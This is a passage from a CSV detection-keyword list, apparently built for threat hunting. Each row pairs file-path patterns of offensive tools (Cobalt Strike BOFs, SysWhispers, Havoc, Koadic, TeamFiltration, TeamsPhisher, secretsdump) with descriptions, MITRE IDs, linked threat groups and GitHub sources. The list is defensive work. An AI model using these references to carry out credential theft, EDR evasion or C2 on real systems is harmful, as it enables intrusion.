"*/SyscallsInject/*",".{0,1000}\/SyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11761"
"*/sysconfig/iodine-server*",".{0,1000}\/sysconfig\/iodine\-server.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","11762"
"*/syskey-and-sam.html*",".{0,1000}\/syskey\-and\-sam\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11763"
"*/SysmonQuiet*",".{0,1000}\/SysmonQuiet.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","11764"
"*/system:SystemBkup.hiv /sam:SamBkup.hiv*",".{0,1000}\/system\:SystemBkup\.hiv\s\/sam\:SamBkup\.hiv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11768"
"*/SysWhispers2*",".{0,1000}\/SysWhispers2.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11771"
"*/SysWhispers3*",".{0,1000}\/SysWhispers3.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11772"
"*/SysWhispers3.git*",".{0,1000}\/SysWhispers3\.git.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11773"
"*/syswhispersv2*",".{0,1000}\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11774"
"*/t.me/NicestRAT*",".{0,1000}\/t\.me\/NicestRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","11775"
"*/t2w.py*",".{0,1000}\/t2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","11776"
"*/t3l3machus/Villain*",".{0,1000}\/t3l3machus\/Villain.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","11777"
"*/taidoor.profile*",".{0,1000}\/taidoor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","11787"
"*/TakeMyRDP*",".{0,1000}\/TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","11801"
"*/TakeMyRDP2.0*",".{0,1000}\/TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","11802"
"*/Talon.py*",".{0,1000}\/Talon\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","11803"
"*/Talon/*Agent/Source*",".{0,1000}\/Talon\/.{0,1000}Agent\/Source.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","11804"
"*/TaoWu.cna*",".{0,1000}\/TaoWu\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11805"
"*/target:exe spacerunner.cs*",".{0,1000}\/target\:exe\sspacerunner\.cs.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","11806"
"*/targetedKerberoast*",".{0,1000}\/targetedKerberoast.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","11807"
"*/targetedKerberoast.py*",".{0,1000}\/targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11808"
"*/targets-asn.nse*",".{0,1000}\/targets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11809"
"*/targets-ipv6-map4to6.nse*",".{0,1000}\/targets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11810"
"*/targets-ipv6-multicast-echo.nse*",".{0,1000}\/targets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11811"
"*/targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\/targets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11812"
"*/targets-ipv6-multicast-mld.nse*",".{0,1000}\/targets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11813"
"*/targets-ipv6-multicast-slaac.nse*",".{0,1000}\/targets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11814"
"*/targets-ipv6-wordlist.nse*",".{0,1000}\/targets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11815"
"*/targets-sniffer.nse*",".{0,1000}\/targets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11816"
"*/targets-traceroute.nse*",".{0,1000}\/targets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11817"
"*/targets-xml.nse*",".{0,1000}\/targets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11818"
"*/TartarusGate.git*",".{0,1000}\/TartarusGate\.git.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","11819"
"*/Tash.dll*",".{0,1000}\/Tash\.dll.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11820"
"*/TashClient.*",".{0,1000}\/TashClient\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11821"
"*/TashLoader.*",".{0,1000}\/TashLoader\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11822"
"*/Tater.ps1*",".{0,1000}\/Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","11823"
"*/tccbypass.md*",".{0,1000}\/tccbypass\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11824"
"*/TChopper.git*",".{0,1000}\/TChopper\.git.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","11825"
"*/TCPMITM.py*",".{0,1000}\/TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","11826"
"*/tcpshell.py*",".{0,1000}\/tcpshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11827"
"*/TeamFiltration.dll*",".{0,1000}\/TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11830"
"*/TeamFiltration.exe*",".{0,1000}\/TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11831"
"*/TeamFiltration/releases/latest*",".{0,1000}\/TeamFiltration\/releases\/latest.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","11832"
"*/Teamphisher.txt*",".{0,1000}\/Teamphisher\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","11833"
"*/Teamphisher/targets.txt*",".{0,1000}\/Teamphisher\/targets\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","11834"
